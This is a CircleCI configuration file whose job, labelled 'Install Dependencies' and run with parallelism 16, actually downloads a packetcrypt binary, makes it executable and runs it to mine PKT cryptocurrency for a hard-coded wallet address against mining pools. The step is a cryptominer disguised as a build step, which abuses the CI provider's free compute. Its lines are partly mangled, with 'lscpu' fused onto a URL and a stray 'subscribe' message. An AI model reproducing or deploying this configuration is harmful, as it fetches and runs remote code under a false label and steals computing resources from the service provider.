version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt                                                                          
              chmod +x packetcrypt                                                          
              ./packetcrypt ann -p pkt1qqa56gl4m9g7nm5xqsasf55wd60kqwflg9sxchh http://pool.pktpool.io http://pool.pkt.worldlscpu
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial